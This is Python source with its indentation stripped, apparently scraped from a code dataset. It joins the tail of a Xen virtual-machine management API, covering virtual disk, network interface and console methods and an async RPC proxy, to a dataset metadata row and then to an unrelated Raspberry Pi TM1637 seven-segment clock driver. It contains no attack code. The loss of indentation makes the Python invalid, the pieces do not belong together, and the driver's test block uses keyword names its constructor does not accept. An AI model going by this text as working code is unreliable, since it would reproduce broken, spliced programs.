if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
new_vdi = xennode.get_vdi_by_uuid(new_vdi_ref)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', new_vdi_ref])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = new_vdi_ref
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
return xen_api_error(['INTERNAL_ERROR', str(e)])
return xen_api_success_void()
# class methods
def VBD_create_on(self, session, vbd_struct, host_ref):
storage = self._get_BNStorageAPI_instance()
# log.debug(vbd_struct)
if BNPoolAPI._isMaster:
vbd_type = vbd_struct.get('type')
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_create(session, vbd_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
vdi = vbd_struct.get('VDI')
if vdi:
log.debug(storage.VDI_get_name_label(session, vdi))
vdi_name = storage.VDI_get_name_label(session, vdi).get('Value')
if vdi_name:
remote_vdi = xen_rpc_call(remote_ip, 'VDI_get_by_name_label', vdi_name).get('Value')
if remote_vdi:
vbd_struct['VDI'] = remote_vdi
else:
return xen_api_error(['%s VDI %s not find!' % (remote_ip, vdi_name)])
else:
return xen_api_error(['Invaild VDI %s' % vdi])
else:
return xen_api_error(['vbd struct error, VDI not define.'])
return xen_rpc_call(remote_ip, 'VBD_create', vbd_struct)
else:
return self.VBD_create(session, vbd_struct)
def VBD_create(self, session, vbd_struct):
vm_ref = vbd_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VBD_create(session, vbd_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VBD_create', vbd_struct)
else:
return self._VBD_create(session, vbd_struct)
def _VBD_create(self, session, vbd_struct):
xendom = XendDomain.instance()
xennode = XendNode.instance()
if not xendom.is_valid_vm(vbd_struct['VM']):
return xen_api_error(['VM_NOT_FOUND', 'VM', vbd_struct['VM']])
dom = xendom.get_vm_by_uuid(vbd_struct['VM'])
vdi = xennode.get_vdi_by_uuid(vbd_struct['VDI'])
if not vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vbd_struct['VDI']])
# new VBD via VDI/SR
vdi_image = vdi.get_location()
log.debug("vdi location: %s" % vdi_image)
try:
vbd_ref = XendTask.log_progress(0, 100,
dom.create_vbd_for_xenapi,
vbd_struct, vdi_image)
log.debug('VBD_create %s' % vbd_ref)
except XendError, e:
log.exception("Error in VBD_create")
return xen_api_error(['INTERNAL_ERROR', str(e)])
xendom.managed_config_save(dom)
return xen_api_success(vbd_ref)
def VBD_destroy(self, session, vbd_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
# vdi_ref = XendDomain.instance()\
# .get_dev_property_by_uuid('vbd', vbd_ref, "VDI")
# vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
XendTask.log_progress(0, 100, vm.destroy_vbd, vbd_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def VBD_destroy_on(self, session, vbd_ref, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_destroy(session, vbd_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, "VBD_destroy", vbd_ref)
else:
return self.VBD_destroy(session, vbd_ref)
def _VBD_get(self, vbd_ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid(
'vbd', vbd_ref, prop))
# attributes (ro)
def VBD_get_metrics(self, _, vbd_ref):
return xen_api_success(vbd_ref)
def VBD_get_runtime_properties(self, _, vbd_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
device = dominfo.get_dev_config_by_uuid('vbd', vbd_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vbd')
device_dicts = [dict(device_sxp[1][0:]) for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['virtual-device']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
# attributes (rw)
def VBD_get_VM(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VM')
def VBD_get_VDI(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VDI')
def VBD_get_device(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'device')
def VBD_get_bootable(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'bootable')
def VBD_get_mode(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'mode')
def VBD_get_type(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'type')
def VBD_set_bootable(self, session, vbd_ref, bootable):
bootable = bool(bootable)
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'bootable', int(bootable))
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_mode(self, session, vbd_ref, mode):
if mode == 'RW':
mode = 'w'
else:
mode = 'r'
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'mode', mode)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_VDI(self, session, vbd_ref, VDI):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'VDI', VDI)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_get_all(self, session):
xendom = XendDomain.instance()
vbds = [d.get_vbds() for d in XendDomain.instance().list('all')]
vbds = reduce(lambda x, y: x + y, vbds)
return xen_api_success(vbds)
# Xen API: Class VBD_metrics
# ----------------------------------------------------------------
VBD_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'last_updated']
VBD_metrics_attr_rw = []
VBD_metrics_methods = []
def VBD_metrics_get_all(self, session):
return self.VBD_get_all(session)
def VBD_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vbd', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vbd', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vbd', ref, 'io_write_kbs'),
'last_updated' : now()
})
def VBD_metrics_get_io_read_kbs(self, _, ref):
return self._VBD_get(ref, 'io_read_kbs')
def VBD_metrics_get_io_write_kbs(self, session, ref):
return self._VBD_get(ref, 'io_write_kbs')
def VBD_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class VIF
# ----------------------------------------------------------------
VIF_attr_ro = ['network',
'VM',
'metrics',
'runtime_properties']
VIF_attr_rw = ['device',
'MAC',
'MTU',
'security_label',
'physical_network',
'physical_network_local',
]
VIF_attr_inst = VIF_attr_rw
VIF_methods = [('destroy', None)]
VIF_funcs = [('create', 'VIF'),
('create_on', 'VIF'),
('create_bind_to_physical_network', None)
]
# object methods
def VIF_get_record(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
cfg = vm.get_dev_xenapi_config('vif', vif_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
valid_vif_keys = self.VIF_attr_ro + self.VIF_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vif_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vif_ref
return xen_api_success(return_cfg)
# class methods
def VIF_create_on(self, session, vif_struct, host_ref):
if BNPoolAPI._isMaster:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
#if network:
# log.debug(xenapi.network_get_name_label(session, network))
# network_label = xenapi.network_get_name_label(session, network).get('Value')
# # log.debug(network_label)
#else:
# vif_struct['network'] = 'ovs0'
# log.debug("get from network : %s" % vif_struct.get('network'))
# #return xen_api_error(['network not found'])
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_create(session, vif_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
#remote_network = xen_rpc_call(remote_ip, 'network_get_by_name_label', network_label).get('Value')
#if remote_network:
# log.debug(remote_network[0])
# vif_struct['network'] = remote_network[0]
#else:
# return xen_api_error(['%s network not found!' % remote_ip, 'Network'])
return xen_rpc_call(remote_ip, 'VIF_create', vif_struct)
else:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
return self.VIF_create(session, vif_struct)
def VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
if BNPoolAPI._isMaster:
vm_ref = vif_struct.get('VM', '')
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create_bind_to_physical_network', vif_struct, phy_network)
else:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
def _VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
vm_ref = vif_struct.get('VM', '')
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
xenapi = self._get_XendAPI_instance()
log.debug('VIF create bind to physical network')
network_refs = xenapi.network_get_all(session).get('Value')
network_names = []
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names.append(namelabel)
# log.debug(network_names)
if phy_network not in network_names:
return xen_api_error(['Network name do not exist!'] + network_names)
vif_struct['network'] = phy_network
log.debug("get from network : %s" % vif_struct.get('network'))
return self._VIF_create(session, vif_struct)
'''
set physical network for vm, pass the refer
'''
def VIF_set_physical_network(self, session, vif_ref, vm_ref, phy_network):
log.debug('VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_set_physical_network', vif_ref, vm_ref, phy_network)
else:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
def VIF_set_physical_network_local(self, session, vif_ref, vm_ref, phy_network):
xenapi = self._get_XendAPI_instance()
log.debug('local method VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
network_refs = xenapi.network_get_all(session).get('Value')
network_names = {}
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names[namelabel] = ref
log.debug(network_names)
if phy_network not in network_names:
return xen_api_error(['Network name do not exist!'] + network_names)
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
log.debug('vif cannot be found on vm!')
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
# if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
# log.debug('VM(%s) is running!' % vm_ref)
# return xen_api_error(['VM is running!'])
try:
origin_network = self.VIF_get_network(session, vif_ref).get('Value')
except:
log.exception("VIF did not have Network field.")
origin_network = None
new_network = network_names[phy_network]
origin_bridge = self._VIF_get(vif_ref, 'bridge').get('Value')
# origin_bridge = xenapi.network_get_name_label(session, origin_network).get('Value')
new_bridge = phy_network
# log.debug('origin_network: %s and new_network: %s' % (origin_network, new_network))
# log.debug('origin_bridge: %s and new_bridge: %s' % (origin_bridge, new_bridge))
#must set both network and bridge, or set bridge only,
#do not set network only, set network only won't work
rc = True
rc1 = True
if origin_network and cmp(origin_network, new_network) != 0 :
rc = self._VIF_set(vif_ref, 'network', new_network, origin_network)
if cmp(origin_bridge, new_bridge) != 0:
rc1 = self._VIF_set(vif_ref, 'bridge', new_bridge, origin_bridge)
if rc == False or rc1 == False:
log.error('set vif physical network failed')
return xen_api_error(['set vif physical network failed'])
return xen_api_success_void()
def VIF_create(self, session, vif_struct):
vm_ref = vif_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create(session, vif_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create', vif_struct)
else:
return self._VIF_create(session, vif_struct)
def _VIF_create(self, session, vif_struct):
xendom = XendDomain.instance()
mac = vif_struct.get('MAC')
vm_ref = vif_struct.get('VM')
if not xendom.is_valid_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND', 'VM', vif_struct.get('VM')])
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
if not self._VIF_is_mac_format_legal(mac):
return xen_api_error(['MAC_INVALID'])
dom = xendom.get_vm_by_uuid(vif_struct.get('VM'))
try:
vif_ref = dom.create_vif(vif_struct)
xendom.managed_config_save(dom)
return xen_api_success(vif_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def _VIF_is_mac_format_legal(self, mac):
mac_re = re.compile("00:16:3e:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]")
if not mac:
return True
if mac and cmp(mac_re.match(mac), None) != 0:
return True
return False
def VIF_destroy(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
vm.destroy_vif(vif_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def _VIF_get(self, ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid('vif', ref, prop))
# getters/setters
def VIF_get_metrics(self, _, vif_ref):
return xen_api_success(vif_ref)
def VIF_get_VM(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
return xen_api_success(vm.get_uuid())
def VIF_get_MTU(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MTU')
def VIF_get_MAC(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MAC')
def VIF_get_device(self, session, vif_ref):
return self._VIF_get(vif_ref, 'device')
def VIF_get_network(self, session, vif_ref):
return self._VIF_get(vif_ref, 'network')
def VIF_get_all(self, session):
xendom = XendDomain.instance()
vifs = [d.get_vifs() for d in XendDomain.instance().list('all')]
vifs = reduce(lambda x, y: x + y, vifs)
return xen_api_success(vifs)
def VIF_get_runtime_properties(self, _, vif_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vif', vif_ref)
device = dominfo.get_dev_config_by_uuid('vif', vif_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vif')
device_dicts = [dict(device_sxp[1][1:])
for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['handle']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
def VIF_get_security_label(self, session, vif_ref):
return self._VIF_get(vif_ref, 'security_label')
def _VIF_set(self, ref, prop, val, old_val):
return XendDomain.instance().set_dev_property_by_uuid(
'vif', ref, prop, val, old_val)
def VIF_set_security_label(self, session, vif_ref, sec_lab, old_lab):
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
raise SecurityError(-xsconstants.XSERR_RESOURCE_IN_USE)
rc = self._VIF_set(vif_ref, 'security_label', sec_lab, old_lab)
if rc == False:
raise SecurityError(-xsconstants.XSERR_BAD_LABEL)
return xen_api_success(xsconstants.XSERR_SUCCESS)
# Xen API: Class VIF_metrics
# ----------------------------------------------------------------
VIF_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'io_total_read_kbs',
'io_total_write_kbs',
'last_updated']
VIF_metrics_attr_rw = []
VIF_metrics_methods = []
def VIF_metrics_get_all(self, session):
return self.VIF_get_all(session)
def VIF_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vif', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vif', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vif', ref, 'io_write_kbs'),
'io_total_read_kbs' : vm.get_dev_property('vif', ref, 'io_total_read_kbs'),
'io_total_write_kbs' : vm.get_dev_property('vif', ref, 'io_total_write_kbs'),
'last_updated' : now()
})
def VIF_metrics_get_io_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_read_kbs')
def VIF_metrics_get_io_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_write_kbs')
def VIF_metrics_get_io_total_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_total_read_kbs')
def VIF_metrics_get_io_total_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_total_write_kbs')
def VIF_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class console
# ----------------------------------------------------------------
console_attr_ro = ['location', 'protocol', 'VM']
console_attr_rw = ['other_config']
console_methods = [('destroy', None)]
console_funcs = [('create', 'console'),
('create_on', 'console')]
def console_get_all(self, session):
xendom = XendDomain.instance()
# cons = list(BNPoolAPI._consoles_to_VM.keys())
cons = [d.get_consoles() for d in XendDomain.instance().list('all')]
cons = reduce(lambda x, y: x + y, cons)
return xen_api_success(cons)
def console_get_location(self, session, console_ref):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_location(console_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "console_get_location", console_ref)
else:
return self._console_get_location(console_ref)
def _console_get_location(self, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'location'))
def console_get_protocol(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'protocol'))
def console_get_VM(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
return xen_api_success(vm.get_uuid())
def console_get_other_config(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'other_config'))
# object methods
def _console_get_record(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
cfg = vm.get_dev_xenapi_config('console', console_ref)
log.debug(cfg)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
valid_console_keys = self.console_attr_ro + self.console_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_console_keys:
return_cfg[k] = cfg[k]
return xen_api_success(return_cfg)
def console_get_record(self, session, console_ref):
if BNPoolAPI._isMaster:
# try:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_record(session, console_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'console_get_record', console_ref)
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.console.get_record(session_ref, console_ref)
# except KeyError:
# return xen_api_error(['key error', console_ref])
# except socket.error:
# return xen_api_error(['socket error', console_ref])
else:
return self._console_get_record(session, console_ref)
def console_create_on(self, session, console_struct, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.console_create(session, console_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'console_create', console_struct)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct("console_create", response.get('Value'), console_struct.get('VM'))
return response
else:
return self.console_create(session, console_struct)
def console_create(self, session, console_struct):
vm_ref = console_struct['VM']
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_create(session, console_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'console_create', console_struct)
else:
return self._console_create(session, console_struct)
def _console_create(self, session, console_struct):
xendom = XendDomain.instance()
if not xendom.is_valid_vm(console_struct['VM']):
return xen_api_error(['HANDLE_INVALID', 'VM',
console_struct['VM']])
dom = xendom.get_vm_by_uuid(console_struct['VM'])
try:
if 'protocol' not in console_struct:
return xen_api_error(['CONSOLE_PROTOCOL_INVALID',
'No protocol specified'])
console_ref = dom.create_console(console_struct)
xendom.managed_config_save(dom)
BNPoolAPI.update_data_struct("console_create", console_ref, dom.get_uuid())
return xen_api_success(console_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def console_destroy(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'Console', console_ref])
vm.destroy_console(console_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def console_set_other_config(self, session, console_ref, other_config):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('console', console_ref)
vm.set_console_other_config(console_ref, other_config)
xd.managed_config_save(vm)
return xen_api_success_void()
class BNVMAPIAsyncProxy:
""" A redirector for Async.Class.function calls to XendAPI
but wraps the call for use with the XendTaskManager.
@ivar xenapi: Xen API instance
@ivar method_map: Mapping from XMLRPC method name to callable objects.
"""
method_prefix = 'Async.'
def __init__(self, xenapi):
"""Initialises the Async Proxy by making a map of all
implemented Xen API methods for use with XendTaskManager.
@param xenapi: XendAPI instance
"""
self.xenapi = xenapi
self.method_map = {}
for method_name in dir(self.xenapi):
method = getattr(self.xenapi, method_name)
if method_name[0] != '_' and hasattr(method, 'async') \
and method.async == True:
self.method_map[method.api] = method
def _dispatch(self, method, args):
"""Overridden method so that SimpleXMLRPCServer will
resolve methods through this method rather than through
inspection.
@param method: marshalled method name from XMLRPC.
@param args: marshalled arguments from XMLRPC.
"""
# Only deal with method names that start with "Async."
if not method.startswith(self.method_prefix):
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
# Lookup synchronous version of the method
synchronous_method_name = method[len(self.method_prefix):]
if synchronous_method_name not in self.method_map:
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
method = self.method_map[synchronous_method_name]
# Check that we've got enough arguments before issuing a task ID.
needed = argcounts[method.api]
if len(args) != needed:
return xen_api_error(['MESSAGE_PARAMETER_COUNT_MISMATCH',
self.method_prefix + method.api, needed,
len(args)])
# Validate the session before proceeding
session = args[0]
if not auth_manager().is_session_valid(session):
return xen_api_error(['SESSION_INVALID', session])
# create and execute the task, and return task_uuid
return_type = getattr(method, 'return_type', '<none/>')
task_uuid = XendTaskManager.create_task(method, args,
synchronous_method_name,
return_type,
synchronous_method_name,
session)
return xen_api_success(task_uuid)
def instance():
"""Singleton constructror. Use this method instead of the class constructor.
"""
global inst
try:
inst
except:
inst = BNVMAPI(None)
return inst
|
mit
| -6,386,652,897,247,954,000
| 40.294742
| 164
| 0.508084
| false
| 3.707909
| true
| false
| false
|
KyleKing/PiAlarm
|
.archive-python/modules/tm1637.py
|
1
|
6795
|
"""Manipulate a TM1637 7-segment display."""
import math
import threading
from time import localtime, sleep
from . import config as cg
from .context import IO
IO.setwarnings(False)
IO.setmode(IO.BCM)
HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d,
0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71]
ADDR_AUTO = 0x40
ADDR_FIXED = 0x44
STARTADDR = 0xC0
class TM1637(object):
"""TM1637 7-Segment Display."""
def __init__(self, clk, dio, brightness=1.0):
"""Initializer."""
self.CLK = clk
self.DIO = dio
self.brightness = brightness
self.double_point = False
self.current_values = [0, 0, 0, 0]
IO.setup(self.CLK, IO.OUT)
IO.setup(self.DIO, IO.OUT)
def cleanup(self):
"""Stop updating clock, turn off display, and cleanup GPIO."""
self.stop_clock()
self.clear()
IO.cleanup()
def clear(self):
"""Clear display."""
b = self.brightness
point = self.double_point
self.brightness = 0
self.double_point = False
data = [0x7F, 0x7F, 0x7F, 0x7F]
self.show(data)
# Restore previous settings:
self.brightness = b
self.double_point = point
def show(self, data):
"""Show data on display."""
for i in range(0, 4):
self.current_values[i] = data[i]
self.start()
self.write_byte(ADDR_AUTO)
self.br()
self.write_byte(STARTADDR)
for i in range(0, 4):
self.write_byte(self.coding(data[i]))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_digit(self, idx, data):
"""Set 7-segment digit by index [0, 3]."""
assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data)
self.current_values[idx] = data
self.start()
self.write_byte(ADDR_FIXED)
self.br()
self.write_byte(STARTADDR | idx)
self.write_byte(self.coding(data))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_brightness(self, percent):
"""Set brightness in range 0-1."""
max_brightness = 7.0
brightness = math.ceil(max_brightness * percent)
if (brightness < 0):
brightness = 0
if (self.brightness != brightness):
self.brightness = brightness
self.show(self.current_values)
def show_colon(self, on):
"""Show or hide double point divider."""
if (self.double_point != on):
self.double_point = on
self.show(self.current_values)
def write_byte(self, data):
"""Write byte to display."""
for i in range(0, 8):
IO.output(self.CLK, IO.LOW)
if (data & 0x01):
IO.output(self.DIO, IO.HIGH)
else:
IO.output(self.DIO, IO.LOW)
data = data >> 1
IO.output(self.CLK, IO.HIGH)
# Wait for ACK
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.HIGH)
IO.output(self.CLK, IO.HIGH)
IO.setup(self.DIO, IO.IN)
while IO.input(self.DIO):
sleep(0.001)
if (IO.input(self.DIO)):
IO.setup(self.DIO, IO.OUT)
IO.output(self.DIO, IO.LOW)
IO.setup(self.DIO, IO.IN)
IO.setup(self.DIO, IO.OUT)
def start(self):
"""Send start signal to TM1637."""
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.LOW)
def stop(self):
"""Stop clock."""
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
def br(self):
"""Terse break."""
self.stop()
self.start()
def coding(self, data):
"""Set coding of display."""
point_data = 0x80 if self.double_point else 0
return 0 if data == 0x7F else HexDigits[data] + point_data
def clock(self, military_time):
"""Clock thread script."""
# Based on: https://github.com/johnlr/raspberrypi-tm1637
self.show_colon(True)
while (not self.__stop_event.is_set()):
t = localtime()
hour = t.tm_hour
if not military_time:
hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12
d0 = hour // 10 if hour // 10 else 0
d1 = hour % 10
d2 = t.tm_min // 10
d3 = t.tm_min % 10
digits = [d0, d1, d2, d3]
self.show(digits)
# # Optional visual feedback of running alarm:
# print digits
# for i in tqdm(range(60 - t.tm_sec)):
for i in range(60 - t.tm_sec):
if (not self.__stop_event.is_set()):
sleep(1)
def start_clock(self, military_time=True):
"""Start clock thread."""
# Stop event based on: http://stackoverflow.com/a/6524542/3219667
self.__stop_event = threading.Event()
self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,))
self.__clock_thread.daemon = True # stops w/ main thread
self.__clock_thread.start()
def stop_clock(self):
"""Stop clock thread."""
try:
print('Attempting to stop live clock')
self.__stop_event.set()
self.clear()
except AttributeError:
print('No clock to close')
if __name__ == '__main__':
"""Confirm the display operation"""
# Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21)
clock = cg.get_pin('7Segment', 'clk')
digital = cg.get_pin('7Segment', 'dio')
display = TM1637(CLK=clock, DIO=digital, brightness=1.0)
print('clock', clock)
